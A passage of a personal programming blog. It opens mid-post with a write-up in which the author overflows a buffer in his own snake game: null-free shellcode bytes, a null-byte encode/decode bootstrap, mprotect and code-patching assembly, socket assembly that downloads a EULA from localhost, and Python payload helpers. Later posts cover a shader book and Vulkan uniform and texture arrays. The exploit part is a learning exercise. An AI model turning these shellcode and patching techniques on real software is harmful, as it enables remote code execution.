Luckily the original code could be refactored pretty simply to work around the problem. I just added a few unnecessary math operations to avoid needing any instructions with null bytes in them:

.text
.globl _main
_main:
        mov $25400, %di
        sub $25358, %di
        mov $0x2, %al
        shl $24, %eax
        add $0x1, %al
        syscall

Assembling this with as and using objdump to get me the hex bytes gave me the following, strcpy friendly, machine code:

\x66\xbf\x38\x63\x66\x81\xef\x0e\x63\xb0\x02\xc1\xe0\x18\x04\x01\x0f\x05

Modifying the python server script to send this was just a matter of replacing the first set of \x01 bytes with this code string, and boom, the snake game was returning the value 42 before I had a chance to accept the EULA. This was great, but it didn’t feel like my plan of rewriting assembly to avoid null bytes was going to be very scalable when I tried to do real work. The original story talked about needing to encode/decode instructions to allow null bytes to be sent, so that was my next project.

Encoding/Decoding Null Bytes

I don’t know if the team at Insomniac did something more fancy, but for my purposes, all I needed to do was replace all null bytes in my machine code string with 0xCD and write some assembly that walked the bytes of the eula buffer (after strcpy) and replaced instances of 0xCD with 0x00. I may have just gotten lucky, but none of the code that I wrote for the rest of this project ever had a problem with a valid 0xCD byte getting accidentally stomped by this.

To get the machine code string for this bit of assembly, I actually just ended up writing it as a separate program and extracting the hex bytes using Hex Fiend:

.text
.globl _main
_main:
        movabsq $0x1111111111111111, %rax
        movabsq $0x1111111111107E26, %rcx
        subq %rcx, %rax  # result of sub is addr of code after decode block
        mov %rax, %rdx
        mov $0xFFFF, %dx
        sub $0xFFFF, %dx # zero dx without getting a null in machine code 
# loop starts here
        cmpb $0xCD, (%rax)
        jne .+6 
        subb $0xCD, (%rax)
# jump to here if not == 0xcd
        add $0x1, %rax
        add $0x1, %dx
        cmp $0x3D0, %dx # 1035 bytes total, 59 bytes for bootstrap, decode next 976 bytes
        jb .-21
        # int $3 # uncomment to break in debugger here
        ret # end bootstrap
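If the assembly is hard to follow, here’s a rough Python model of both halves of the trick: the server-side swap of null bytes for 0xCD, and the in-place decode the bootstrap does after strcpy. It’s a sketch only. The function names are made up, and the 59 byte bootstrap and 0x3D0 byte window are the numbers from the comment in the assembly above.

```python
MARKER = 0xCD         # stand-in byte for nulls
BOOTSTRAP_LEN = 59    # bytes of decode code at the start of the buffer
DECODE_COUNT = 0x3D0  # number of bytes the loop walks (976)


def encode_nulls(code: bytes) -> bytes:
    """Server side: make the code string safe to send through strcpy."""
    return code.replace(b"\x00", bytes([MARKER]))


def decode_in_place(buf: bytearray, start: int = BOOTSTRAP_LEN,
                    count: int = DECODE_COUNT) -> None:
    """Client side: mirror of the cmpb / subb loop in the bootstrap."""
    end = min(start + count, len(buf))  # bounds check the assembly doesn't need
    for i in range(start, end):
        if buf[i] == MARKER:
            buf[i] -= MARKER            # 0xCD - 0xCD == 0x00


original = bytes.fromhex("66bf2a00b8010000020f05")  # the exit(42) string
buf = bytearray(b"\x90" * BOOTSTRAP_LEN + encode_nulls(original))
decode_in_place(buf)
```

Note that any genuine 0xCD byte inside the decode window would also get zeroed, which is the risk mentioned above.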

Getting this working was a lot of trial and error (mostly because I hadn’t written much assembly before). I also got tripped up for awhile because I was originally messing with some caller save registers and not cleaning them up, which caused weird problems later. Also, I couldn’t get labels working with the code I was sending over the wire, so I was stuck with jmp-ing to addresses. Jmp-ing to an absolute address seemed to work if I provided an address in a register, but apparently conditional jumps REQUIRE a relative address, which was a pain.

If you’re trying something like this on your own, my standard workflow was to put a breakpoint on the eula buffer, sprinkle my assembly liberally with int $3 calls (which cause the debugger to break there), and then examine the memory of the target buffer with an lldb command like “memory read --size 1 --format x 0x92b0 --count 1024”.

Despite all my complaining though, it did work once I had ironed out all the kinks, which meant it was time to actually do something interesting to the snake game.

Patching Some Code Like a Hacker

The first thing I wanted to do was change some code that shipped with the game. In this case, I wanted to change the point value for hitting a target from 3 to 15. The score value for a target was hardcoded in the code snippet below, so changing it required modifying currently loaded machine code, just like I did in the sample project earlier.

void SnakeGame::tick()
{
    if (currentMode == PLAYING)
    {
        inputMutex.lock();
        Point newHead = {snakeSegments.front().x + velocity.x, snakeSegments.front().y + velocity.y};
        inputMutex.unlock();

        if (newHead.x == targetPos.x && newHead.y == targetPos.y)
        {
            score+=3;
            //rest of code omitted because it isnt important

It was time to fire up Hopper again, this time to figure out the address of this instruction. The tick function itself is located at address 0000000000004100 (as shown below). Working from there, the first add $0x3 instruction (which turned out to be the correct one) is located at 4199.

The page that contains the tick function starts at 0000000000004000, so that’s the address I’m going to feed to mprotect. On Mac, mprotect is system call 0x200004A, so the assembly to mark this page as PROT_READ + PROT_WRITE + PROT_EXEC looked like the following:

_markpage:
    movl $0x200004A, %eax # 4A is the mprotect syscall
    movabsq $0x0000000000004000, %rdi # first arg is page addr, this is the page that contains tick
    movq $4096, %rsi # second arg is len, we want 1 page
    movq $7, %rdx # third arg is flags
    syscall
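The constants in that snippet can be double checked with a few lines of arithmetic. This is just a calculator-style sketch with helper names I made up; it assumes the 4096 byte page size used above and the 0x2000000 prefix that macOS uses for BSD system calls on x86-64.

```python
PAGE_SIZE = 4096
SYSCALL_CLASS_UNIX = 0x2000000  # macOS x86-64 prefix for BSD syscalls
MPROTECT = 74                   # 0x4A

PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4


def page_start(addr: int) -> int:
    """Round an address down to the start of the page that contains it."""
    return addr & ~(PAGE_SIZE - 1)


def unix_syscall(number: int) -> int:
    """Value to load into eax before the syscall instruction."""
    return SYSCALL_CLASS_UNIX | number


tick_page = page_start(0x4100)                # page holding tick()
flags = PROT_READ | PROT_WRITE | PROT_EXEC    # the $7 in the assembly
```

Both the start of tick (0x4100) and the byte that gets patched later (0x419B) land in the same page, which is why a single one page mprotect call is enough.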

If you’re unfamiliar with how system calls work on mac, you may want to read this article, which was extremely helpful when I was figuring all this out.

After marking the page as writeable, all that I needed to do was to modify the byte at address 0x000000000000419B, which was the byte containing the score value for the target that was hardcoded into the add instruction. Changing that from 3 to 15 just required a move:

_fixscore:
        movabsq $0x000000000000419B, %rax # move location of score add instruction to rax
        movb $0x0F, (%rax)

Similarly, I also took this time to write 42 back to our random seed variable:

_randomseed:
        movabsq $0x00000000000096b0, %rax 
        movq $42, (%rax) # write 42 back to the random seed var

I should note that I’m providing labels in the assembly snippets above that I didn’t actually have in my assembly code, to aid readability. It’s a bit lengthy to paste right into the article, but my entire assembly payload up to this point looked like this (note the string of nop instructions I used to make reading lldb output easier). By now, manually changing null bytes to 0xCD in the machine code was getting tedious, so I wrote a small script to do that automatically. My workflow now looked like this:

Write some assembly
Assemble it with “as”
Get the machine code using Hex Fiend
Paste that into textedit and remove all whitespace
Use my script to swap null bytes for CD
Add the few bytes for overflowing the buffer / setting packetHandler to the end
Double check to make sure the resulting string was still the right size (add extra 0xCDs until it is)
Paste the code string into the python server
Run the server and the game.
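For what it’s worth, here’s a sketch of what a utility that collapses the middle steps of that list might look like. It is hypothetical (hex_to_payload is not part of the project), and it assumes the hex dump is plain hex digits separated by whitespace.

```python
def hex_to_payload(hex_dump: str, tail: bytes, total_len: int) -> bytes:
    """Turn pasted hex into a strcpy-safe payload of exactly total_len bytes."""
    code = bytes.fromhex("".join(hex_dump.split()))  # strip all whitespace
    code = code.replace(b"\x00", b"\xCD")            # swap null bytes for CD
    pad = total_len - len(code) - len(tail)
    if pad < 0:
        raise ValueError("code plus overflow bytes exceed the target size")
    # Pad with extra 0xCDs, then add the overflow bytes to the end.
    return code + b"\xCD" * pad + tail


overflow_tail = b"\x02" * 4 + b"\x03" * 4 + b"\xb0\x92"
example = hex_to_payload("66 bf 2a 00\nb8 01 00 00 02 0f 05", overflow_tail, 1034)
```

The output of something like this could be pasted straight into the server script, leaving only the assemble and run steps to do by hand.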

I probably should have combined a few more of those steps into a utility program, but it’s a bit late for that now.

At this point, I had successfully managed to change the score value for targets in the game, and was feeling pretty super. However, that wasn’t enough for me to be satisfied that I had actually recreated the entire Gamasutra story, so there was still more work to do.

Downloading a Real EULA

Up to now, when the game displayed the EULA, it ended up displaying garbage bytes, because the eula buffer contained our code string. I wanted to fix that by having the payload include instructions for downloading a real EULA string from the server. The original story also mentioned having the payload download additional data, although technically it reads like they downloaded more machine code… I’m not going to split hairs.

Setting up a socket connection in assembly isn’t super exciting, given that socket(), connect(), and recvfrom() are all syscalls on OS X, so there’s nothing exotic about it really. I had so far gotten by without allocating any stack variables (and as such, needing to clean those up), so I ended up reserving the last chunk of the eula buffer to use to store the sockaddr structure I was using, but that’s about as weird as it got. I also hardcoded the values of the sockaddr struct (by writing a C program to set it up and just copying the bytes from the sockaddr struct it created) rather than calculating them the normal way to save some time. Setting all this up looked like this:

_SetUpSocket:
    movl $0x2000061, %eax #  61 is socket
    movq $2, %rdi # first socket arg - AF_INET
    movq $1, %rsi # second socket arg - SOCK_STREAM
    movq $0, %rdx # third socket arg - protocol
    syscall # call socket, socket handle in eax
    movq %rax, %rdi # move socket handle to rdi (first arg to connect)
    movl $0x2000062, %eax # next syscall will be to connect
    movabsq $0x00000000000096a1, %rsi 
    movb $2, (%rsi) # now write the sockaddr bytes
    add $1, %rsi
    movb $0x27, (%rsi)
    add $1, %rsi
    movb $0x15, (%rsi)
    add $1, %rsi
    movq $0x7f, (%rsi)
    add $3, %rsi
    movq $1, (%rsi)
    movabsq $0x00000000000096a0, %rsi # second arg to connect is address of sockaddr struct, located in our buffer (pre-zeroed by bootstrap)
    movq $16, %rdx # third arg is len of sockaddr
    syscall
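The hardcoded bytes are easier to read once you see how they map onto a sockaddr_in. Here’s a small sketch that rebuilds the same 16 bytes with Python’s struct module. The helper name is made up, and the first byte (sin_len on macOS) is left at zero because the assembly above starts writing at offset 1 of the pre-zeroed struct.

```python
import socket
import struct


def sockaddr_in_bytes(host: str, port: int) -> bytes:
    """Pack sin_len, sin_family, sin_port, sin_addr and 8 bytes of sin_zero."""
    return struct.pack(
        "!BBH4s8x",
        0,                       # sin_len, left as zero like the payload does
        socket.AF_INET,          # sin_family, the movb $2
        port,                    # sin_port in network byte order
        socket.inet_aton(host),  # sin_addr, four bytes
    )


addr = sockaddr_in_bytes("127.0.0.1", 10005)
```

Read this way, 0x27 0x15 is port 10005 in network byte order, and the 0x7f and 0x01 writes are the first and last bytes of 127.0.0.1.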

Since I wanted to download the new EULA string into the same buffer that the payload code currently lived, I ended up adding a huge string of NOP instructions before calling recvfrom, and limiting the size of the EULA string so that it wouldn’t stomp on instructions that still mattered. So immediately after the code above, there was a long string of 700 NOP instructions before I actually called recvfrom and then returned from the function. This last bit of assembly looked like this:

_downloadeula:
        movl $0x200001D, %eax # next syscall will be to recvfrom
        movabsq $0x00000000000092b0, %rsi # second arg is address of this buffer
        movq $512, %rdx # third arg is len, eula will be up to 512 bytes 
        movq $0x0, %r10 # fourth arg is flags
        movq $0x0, %r8 # fifth arg is the source sockaddr ptr, use null since we have a connected socket
        movq $0x0, %r9 #  ignore 
        syscall
        ret

If you’re curious, the entire source for this payload is both here and on the github project that accompanies this blog post. Note that the payload code doesn’t exactly match the code string in the final python server script, since I was manually adding padding and replacing some NOPs with 0xCD, as described earlier.

With this payload in place, getting a proper EULA was just a matter of adding a few more lines to the server script to listen for a connection on port 10005 (0x2715, the port bytes hardcoded into the sockaddr struct above) and send back the string when it received that connection. You can see the final server script here if you’re curious. Once that was working, I could send a EULA that was human readable to the client in time to hide the fact that anything nefarious was going on, and my server was able to modify compiled code using a buffer overflow. Woohoo!

Conclusion / References

This was a super cool project to work on, despite it occasionally taking a turn for the very tedious. I learned a ton about areas of programming that I had never had a chance to dabble in before, and feel like I came away from it with a better understanding of how software works in general.

Given how little I knew when I started this, I used a ton of different blog posts and articles to help get me up to speed (in addition to the ones linked explicitly above), and I wanted to list them here in case any are of interest to anyone else. So, in no specific order, here they are:

I also want to link again to Hopper and Hex Fiend, which made my life way easier. Hopper in particular is a really impressive bit of software, and I hope I get an excuse to use it again in the future.

If you want to say hi, or ask any questions about anything in the article, I’m available (sporadically) on Twitter! Thanks for reading!

I Wrote A Book About Shaders!

2019-04-18T00:00:00+00:00

From the looks of my blog archive, it’s been 13 months since I dropped off the map and stopped posting. That’s because around that time I got an e-mail from Apress Books asking if I wanted to write for them. I’ve gotten several messages like this since I started writing my blog, but this one was different in two key ways:

They didn’t have a book idea in mind already, instead, they wanted to know what I might like to write.
Their sales pitch was “you’re already writing about technical things, why not get paid for it?” which I found pretty convincing.

So I replied to the e-mail, and pretty quickly I decided that I wanted to write a book with them, and now you can purchase that book (Amazon link)! The schtick of it is that it’s an example based approach to learning shaders. If you’ve never written a shader before, and want to get your feet wet and learn a few things without necessarily needing to learn a ton of math or graphics api details, this is the book for you. It’s not super technical, it’s really more about having some fun and building a bunch of different things.

Here's what it looks like!

It’s kind of surreal to be holding a physical copy of this thing. Both because it’s the first physical thing that I’ve produced in my career, and because I can’t believe this project is finally finished. So to celebrate, here’s a disorganized collection of thoughts I have about the whole experience.

Writing A Book Is Hard Work

When I started this project I honestly didn’t think it was going to be that much different from regularly writing blog posts. Having now done both, let me say very clearly that writing a book is nothing like writing blog posts. Not only do blog posts not have deadlines, but they can jump around, and can assume any level of ability on the part of your readers, and you can always delete or edit a blog post if you get something wrong. Writing a book is 1000% harder than writing a blog.

There were a lot of days that I didn’t feel like writing. Hell, there were a lot of weeks where I didn’t feel like writing. When people asked how writing was going, my standard answer was “the fun runs out after page 100,” which, depending on the day, was either just a funny default response, or painful truth. I’m completely convinced that books are mostly written out of pure stubbornness, and that the people who write books aren’t necessarily the most qualified people to write about that topic, but they are perhaps the most qualified people to write about that topic that feel like finishing a book.

Finishing A Book Is Scary

Speaking of finishing a book, that’s a scary proposition in itself. By the time things were done, I was both relieved to be done writing and terrified at how many things I knew that I would change if I had more time to work on the project. Now I’m just hoping that there aren’t any huge and embarrassing content mistakes that slipped through the cracks.

Just like making games, having a final deadline where you have to ship the thing is probably the only way that a lot of books ever see the light of day. Without that, by the time I felt ready to publish we’d all be rendering things with quantum computers that path trace on the blockchain, and the book wouldn’t be relevant any more. So instead, I’ve just had to come to grips with the fact that the book isn’t perfect, but it’s done, and that’s ok.

Finishing A Book Is Pretty Great Too

Despite all my complaining, getting the copies of my book in the mail was pretty amazing. Actually finishing the project and seeing the end result has been hugely rewarding, and I’m really glad that I stuck with things until the end. Hopefully people like the book, but even just following through on a large personal project is a great feeling.

Apress Was Pretty Great To Work With

There are lots of horror stories floating around about working with publishers like Packt or Apress, but I have a lot of good things to say about them. The folks that I talked to day to day were professional, easy to work with, and always accommodating when I needed to move a chapter deadline because work was going crazy (I’m a stickler for schedules and deadlines, so they may have been flexible because this only happened a couple of times). They also paid me on time, which seems to be a common thing that other people complain about with technical book publishers.

I was a bit surprised at how little the copy editing team there corrected my grammar and sentence structure, but given how many other mistakes they caught that would have been disastrous to actually print in a book, I can’t say I’m too upset about it. It’s not like I was writing the next great Canadian novel. I also didn’t express this concern to Apress during the copy editing phase of the book, so this is also on me.

I Don’t Want To Write For A While

I think it’s fair to say that I’m a bit burnt out on writing right now. Even though it’s been a few months since I’ve had to do a lot of writing for the book, I still don’t have much desire to start writing blog posts again, and I think I’m going to write a lot less this year in general. Instead, I want to spend more time learning new things and working on things that don’t necessarily translate into a good blog post. Hopefully by the time I feel like writing again, I’ll have some new, interesting things to share.

Hopefully some of you pick up the book and learn a thing or two! In the meantime, I’m always available to chat on Twitter. If you want to make my day, shoot me a message if you grab a copy. Have a good one!

A "Bind Once" Approach to Uniform Data

2018-02-05T00:00:00+00:00

After figuring out how to use a global array of textures to store all the textures that are in use for a frame in a single descriptor set, I returned to my material system project and realized how much easier life would be if I could do all my descriptor set binding at the beginning of a frame, both because I’d avoid any performance overhead from doing lots of binding, and because it greatly simplifies anything related to descriptor set versioning (or dealing with updating buffers that are in flight).

As it turns out, this is totally possible and really easy to do, although I have no idea if it’s a good idea in the grand scheme of things. Also, just like using an array of textures, I couldn’t find anyone else writing about it, so I guess that means it’s on me to share.

So with all that said, this post is going to show off how to use a single, globally bound descriptor set (and a single VkBuffer!) to store all the uniform data needed for multiple objects that are using different shaders.

I’ve set all this up in a demo project (on github) if you just want the code. The fragment shaders I used in that demo are:

#version 450 core
#extension GL_ARB_separate_shader_objects : enable

struct Data48
{
    vec4 colorA;
    vec4 colorB;
    vec4 colorC;
};

layout(binding = 0, set = 0) uniform DATA_48
{
    Data48 testing[8];
}data;

layout(push_constant) uniform PER_OBJECT
{
    int dataIdx;
}pc;

layout(location=0) out vec4 outColor;

void main()
{
    outColor = data.testing[pc.dataIdx].colorA
            + data.testing[pc.dataIdx].colorB
            + data.testing[pc.dataIdx].colorC;
}

and

#version 450 core
#extension GL_ARB_separate_shader_objects : enable

struct Data48
{
    float r;
    vec4 colorB;
    int x;
};

layout(binding = 0, set = 0) uniform DATA_48
{
    Data48 data[8];
}data;

layout(push_constant) uniform PER_OBJECT
{
    int dataIdx;
}pc;

layout(location=0) out vec4 outColor;

void main()
{
    float red = data.data[pc.dataIdx].r;
    float intCast = data.data[pc.dataIdx].x;
    vec4 colorA =  vec4(red, intCast, intCast, intCast);
    outColor = data.data[pc.dataIdx].colorB * colorA;
}

I’ll omit the vert shader because it just passes through uv coords and does nothing fancy. The stars of our show are the ones above.

How This All Works

The trick, which you may have already guessed from the shader code, is to keep all the uniform buffer objects the same size. VkDescriptorSets and VkBuffers don’t actually care about the contents of your uniform buffers, otherwise we’d have to provide a lot more information when setting up a descriptor set binding. All they care about is how big the buffer needs to be.

Knowing that, it follows that if all our shaders are using buffers of the same size, they should all be able to use the same descriptor set, and that’s exactly how things work in practice. It’s almost embarrassing how easy it is to set up the descriptor set layout to do this:

VkDescriptorSetLayoutBinding layoutBinding;
layoutBinding.descriptorCount = 1;
layoutBinding.binding = 0;
layoutBinding.stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT;
layoutBinding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER;
layoutBinding.pImmutableSamplers = 0;

VkDescriptorSetLayoutCreateInfo layoutInfo = {};
layoutInfo.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_CREATE_INFO;
layoutInfo.bindingCount = 1;
layoutInfo.pBindings = &layoutBinding;

vkCreateDescriptorSetLayout(...)

You don’t even need to worry about specifying the number of elements in the array, since it’s all stored in a uniform block. As far as the descriptor set is concerned, we’re not even using an array.

Once you’ve set up your Descriptor Set Layout, allocating the buffer to store the data is similarly easy. I’m going to just copy + paste the utility function call from my demo project, because allocating a buffer and memory associated with it in Vulkan has a lot of boilerplate, but in reality, all you do is create a buffer large enough to hold the array you declared. So if you have an array of length 8 that stores 48 byte structures, your buffer needs to be 8 * 48 (384) bytes large.

vkh::createBuffer(demoData.sharedBuffer,
    demoData.bufferMemory,
    SHARED_UNIFORM_SIZE * BUFFER_ARRAY_SIZE,
    VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT | VK_BUFFER_USAGE_TRANSFER_DST_BIT,
    VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT,
    appContext);

And finally, once you’ve put the data into that buffer, writing the descriptor set is also about as straightforward as possible.

VkDescriptorBufferInfo bufferInfo = {};
bufferInfo.buffer = demoData.sharedBuffer;
bufferInfo.offset = 0;
bufferInfo.range = VK_WHOLE_SIZE;

VkWriteDescriptorSet setWrite = {};
setWrite.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET;
setWrite.dstBinding = 0;
setWrite.dstArrayElement = 0;
setWrite.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER;
setWrite.descriptorCount = 1;
setWrite.dstSet = demoData.descriptorSet;
setWrite.pBufferInfo = &bufferInfo;
setWrite.pImageInfo = 0;

vkUpdateDescriptorSets(appContext.device, 1, &setWrite, 0, nullptr);

This setup is completely identical to setting up a single uniform buffer object, because in practice, that’s exactly what’s going on. The only difference is that to make this work you have to keep a few more things in mind:

Ensuring Buffers Are The Same Size

I’ve already covered that you need to keep the uniform objects the same size, but how to do that is a bit different for Vulkan than it might be if you were working with solely cpu side structs. This is because struct members in Vulkan shaders are 16 byte aligned, which means that if you’re trying to manually specify the structs in your c++ code (like I do in my example project), you need to add some additional syntax to make sure it all adds up properly:

struct LayoutA
{
    __declspec(align(16)) glm::vec4 colorA;
    __declspec(align(16)) glm::vec4 colorB;
    __declspec(align(16)) glm::vec4 colorC;
};

struct LayoutB
{
    __declspec(align(16)) float r;
    __declspec(align(16)) glm::vec4 colorA;
    __declspec(align(16)) int x;
};

Unless you’re working with matrices, this actually ends up making your life easier, because any data type equal to or smaller than the size of a vec4 will fit inside 16 bytes, meaning that rather than worrying about the size of the struct members, you just worry about keeping the count the same. Once you add matrices, you have to start looking at sizes again.
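To make that counting rule concrete, here’s a small sketch that places each member on the next 16 byte boundary, the way the __declspec(align(16)) structs above do, and reports the padded size. It models the padded c++ structs from this post rather than the full GLSL layout rules, and layout and align_up are names invented for the example.

```python
ALIGN = 16  # every member starts on a 16 byte boundary


def align_up(value: int, alignment: int = ALIGN) -> int:
    """Round value up to the next multiple of alignment."""
    return (value + alignment - 1) // alignment * alignment


def layout(members):
    """members is a list of (name, size_in_bytes); returns (offsets, total)."""
    offsets = {}
    cursor = 0
    for name, size in members:
        cursor = align_up(cursor)
        offsets[name] = cursor
        cursor += size
    return offsets, align_up(cursor)


layout_a = layout([("colorA", 16), ("colorB", 16), ("colorC", 16)])
layout_b = layout([("r", 4), ("colorA", 16), ("x", 4)])
with_matrix = layout([("transform", 64), ("x", 4)])  # a mat4 spans four slots
```

Both LayoutA and LayoutB come out at 48 bytes with three members each, while the two member struct with a matrix comes out at 80, which is why member counts stop being enough once matrices show up.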

Once the structs are set up, you just need some quick pointer math to get them into one buffer:

char* sharedData = (char*)malloc(sizeof(LayoutA) * BUFFER_ARRAY_SIZE);
LayoutA first = {glm::vec4(0.5,0,0,0), glm::vec4(0.25,0.5,0,0), glm::vec4(0.0,0.25,0.25,1)};
LayoutB second = {1.0f, glm::vec4(1,1,1,1), 1};

char* writeLocation = sharedData;
memcpy(writeLocation, &first, SHARED_UNIFORM_SIZE);
memcpy((writeLocation += SHARED_UNIFORM_SIZE), &second, SHARED_UNIFORM_SIZE);

This works, but if you’re like me, you likely don’t want to have to recompile your c++ code every time a shader changes. In the past, I got around this by using a program I wrote for my material system (called the “ShaderPipeline”) that uses SPIRV-Cross to generate json descriptions of the shaders that I use. One part of this description is the sizes and offsets of each member of a uniform buffer object, but with the array of structs approach here, SPIRV-Cross ends up just telling you details about the size of the entire array:

"descriptor_sets": [
{
   "set": 0,
   "binding": 0,
   "name": "DATA_48",
   "size": 384,
   "arrayLen": 1,
   "type": "UNIFORM",
   "members": [
       {
           "name": "data",
           "size": 384,
           "offset": 0
       }
   ]
}]

This isn’t super helpful, which I think means that I’m going to have to add some support for GLSL comment annotations to let this tool spit out more information about the “Data48” struct. However, my main point here is that this “array of structs” approach does not require you to recompile your c++ code to make shader changes. Once you know the offsets for each variable, you can just do some quick pointer math and write things where they need to go in a generic way.
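Here’s a rough sketch of what that generic, offset driven write could look like, using a Python bytearray in place of the malloc’d block. The 48 byte slot size comes from the shaders above. The member offsets (0, 16 and 32) are an assumption taken from the padded structs earlier, not something read from SPIRV-Cross output, and write_member is a made-up helper.

```python
import struct

SLOT_SIZE = 48    # size of one struct in the shared array
SLOT_COUNT = 8    # length of the array declared in the shaders


def write_member(buf: bytearray, slot: int, offset: int, fmt: str, *values) -> None:
    """Write one struct member at (slot * SLOT_SIZE + offset)."""
    struct.pack_into(fmt, buf, slot * SLOT_SIZE + offset, *values)


shared = bytearray(SLOT_SIZE * SLOT_COUNT)

# Slot 0 uses the three vec4 layout.
write_member(shared, 0, 0, "<4f", 0.5, 0.0, 0.0, 0.0)
write_member(shared, 0, 16, "<4f", 0.25, 0.5, 0.0, 0.0)
write_member(shared, 0, 32, "<4f", 0.0, 0.25, 0.25, 1.0)

# Slot 1 uses the float / vec4 / int layout.
write_member(shared, 1, 0, "<f", 1.0)
write_member(shared, 1, 16, "<4f", 1.0, 1.0, 1.0, 1.0)
write_member(shared, 1, 32, "<i", 1)
```

Nothing in write_member knows which shader a slot belongs to; it only needs an index, an offset and a format, all of which could come from a json description at runtime.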

Side Note: this ShaderPipeline tool is turning out to be way more useful than the material system demo. I think it’s soon going to need its own github repo.

A Potential Implementation Idea

I haven’t tried this out yet, so take it with a grain of salt, but it seems like this technique would make it possible to keep uniform data centralized in a few different memory pools, one for each size of uniform buffer object (ie: a pool for 48 byte buffers, a pool for 128 byte, etc). Whenever a material instance gets created, it just gets assigned a slot in the appropriate pool for its data. Then when it comes time to actually use the material, it just needs to know enough to pass the index (or indices in the case of multiple uniforms) via push constants to select the right data.
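As a very rough sketch of the bookkeeping side of that idea (untested in a real renderer, and with every name invented for the example), a pool per size could be as simple as a byte array plus a free list of slot indices:

```python
class UniformPool:
    """CPU side stand-in for one fixed-size uniform array."""

    def __init__(self, entry_size: int, capacity: int):
        self.entry_size = entry_size
        self.data = bytearray(entry_size * capacity)
        # Free slots, ordered so that pop() hands out the lowest index first.
        self.free = list(range(capacity - 1, -1, -1))

    def allocate(self) -> int:
        """Reserve a slot; the index is what would go in the push constant."""
        if not self.free:
            raise MemoryError("pool is full")
        return self.free.pop()

    def release(self, index: int) -> None:
        self.free.append(index)

    def write(self, index: int, payload: bytes) -> None:
        if len(payload) > self.entry_size:
            raise ValueError("payload is larger than one pool entry")
        start = index * self.entry_size
        self.data[start:start + len(payload)] = payload


# One pool per uniform size, as described above.
pools = {48: UniformPool(48, 8), 128: UniformPool(128, 8)}
```

A material instance would then only need to remember which pool it lives in and the index that allocate returned.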

It might even be possible to use this separation of materials to figure out which thread should build the commands for drawing each object, so that each command list that gets built doesn’t necessarily even need to bind every one of these uniform arrays.

I think this is the approach I’m going to try first in the next non-demo project that I make with Vulkan (whatever/whenever that is), but as simple as it sounds on paper, there’s already at least one more factor that needs to be mentioned:

Handling Large Buffer Updates

This approach to uniform data runs into problems pretty quickly as you add more entries to the arrays of data. The Vulkan spec states that:

Buffer updates performed with vkCmdUpdateBuffer first copy the data into command buffer memory when the command is recorded (which requires additional storage and may incur an additional allocation), and then copy the data from the command buffer into dstBuffer when the command is executed on a device.

The additional cost of this functionality compared to buffer to buffer copies means it is only recommended for very small amounts of data, and is why it is limited to only 65536 bytes.

Applications can work around this by issuing multiple vkCmdUpdateBuffer commands to different ranges of the same buffer, but it is strongly recommended that they should not.

So once we exceed 65536 bytes in one of our buffer pools, we need to find a different way to update the data there. With the 48 byte buffers we’re using above, we won’t hit that limit for a while, but a hypothetical 128 byte uniform buffer array would reach the limit at only 512 entries, and exceed it with one more.
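The arithmetic behind those numbers is quick to check. This is only a calculator-style sketch with made-up helper names, using the 65536 byte figure from the spec quote above:

```python
MAX_UPDATE_BYTES = 65536  # vkCmdUpdateBuffer limit quoted above


def max_entries(entry_size: int) -> int:
    """Largest array length that still fits in a single update."""
    return MAX_UPDATE_BYTES // entry_size


def fits_in_one_update(entry_size: int, count: int) -> bool:
    return entry_size * count <= MAX_UPDATE_BYTES


entries_48 = max_entries(48)
entries_128 = max_entries(128)
```

So a pool of 48 byte entries has room for a bit over 1300 of them before this becomes a problem, while a pool of 128 byte entries tops out at 512.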

It seems like the right way to address this is to limit the size of any VkBuffer that stores data that needs to be modified, and then just before the renderer begins assembling command lists, copy those buffers into a larger buffer that exceeds the 65536 limit. This approach will add some additional complexity to setting up material data / managing those buffer pools, but wouldn’t increase any complexity as far as our actual rendering logic is concerned… which I like.

Wrap Up

I’ll mention again that I haven’t actually tried this out in a real application, and it could be that there are performance costs associated with binding really large buffers, or some other performance gotcha that I’m going to run into with this approach (in fact, there’s almost certainly at least 10 things I’m not considering), but I really like this approach to working with uniform data, so I’m going to start giving it a shot in larger projects.

This was a really fun post to write and fun project to put together. Between my last post about texture arrays, and this one, I feel like I’m starting to get a good grip on how Vulkan handles Descriptor Sets, and how things map from GLSL to Vulkan.

As always, if you want to say hi, or point out something that I got wrong (or didn’t think about), send a message to @khalladay on Twitter or on Mastodon. Have a good one!

Using Arrays of Textures in Vulkan Shaders

2018-01-28T00:00:00+00:00

Lately I’ve been trying to wrap my head around how to effectively deal with textures in Vulkan. I don’t want any descriptor sets that need to be bound on a per object basis, which means that just sticking each texture into its own set binding isn’t going to work. Instead, thanks to the Vulkan Fast Paths presentation from AMD, I’ve been looking into using a global array of textures that stores all my textures in a descriptor set that I can bind at the beginning of the frame.

The AMD presentation doesn’t actually cover how to set up an array of textures in Vulkan, and I couldn’t find a good explanation of how to do that anywhere online, so now that I’ve figured it out I want to post a quick tutorial on here about it for the next person who gets stuck. I’ll go more in depth about how this array fits into my material system in a later post, but for now I just want to cover the nuts and bolts of setting up a shader to use an array of textures.

One more thing to note before I get started: If you’re looking for a way to work with images of the same size, Sascha Willems has a great example of using a sampler2DArray in his Vulkan Examples Project. The advantage of using an array of textures instead of something like a sampler2DArray is that the array of textures approach supports storing multiple image sizes in the same array by default. I don’t know how much (if any) of a performance penalty you pay for using an array of textures over a sampler2DArray.

With all that said, the goal of this post is going to be to walk through how to set up a Vulkan app so that you can use a shader like this one:

#version 450 core
#extension GL_ARB_separate_shader_objects : enable

layout(set = 0, binding = 0) uniform sampler samp;
layout(set = 0, binding = 1) uniform texture2D textures[8];

layout(push_constant) uniform PER_OBJECT
{
	int imgIdx;
}pc;

layout(location = 0) out vec4 outColor;
layout(location = 0) in vec2 fragUV;

void main()
{
	outColor = texture(sampler2D(textures[pc.imgIdx], samp), fragUV);
}

I’ve put all the code for this up in an example project on github, which renders a full screen quad with the above shader, and changes what image is displayed by updating the imgIdx variable in the push constant, so feel free to grab that and take a look. I’m going to deep dive into parts of that code for the remainder of this post.

Setting Up The Descriptor Set Layout

